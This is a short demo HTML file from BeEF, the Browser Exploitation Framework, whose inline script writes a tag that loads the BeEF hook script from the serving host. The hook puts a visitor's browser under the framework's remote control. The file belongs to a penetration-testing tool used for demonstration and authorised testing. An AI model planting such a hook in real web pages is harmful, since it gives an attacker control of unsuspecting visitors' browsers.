Files
beef/extensions/demos/html/plain.html
2015-12-30 08:11:57 +10:00

11 lines
398 B
HTML

<!--
Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '<%= @hook_uri %>" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>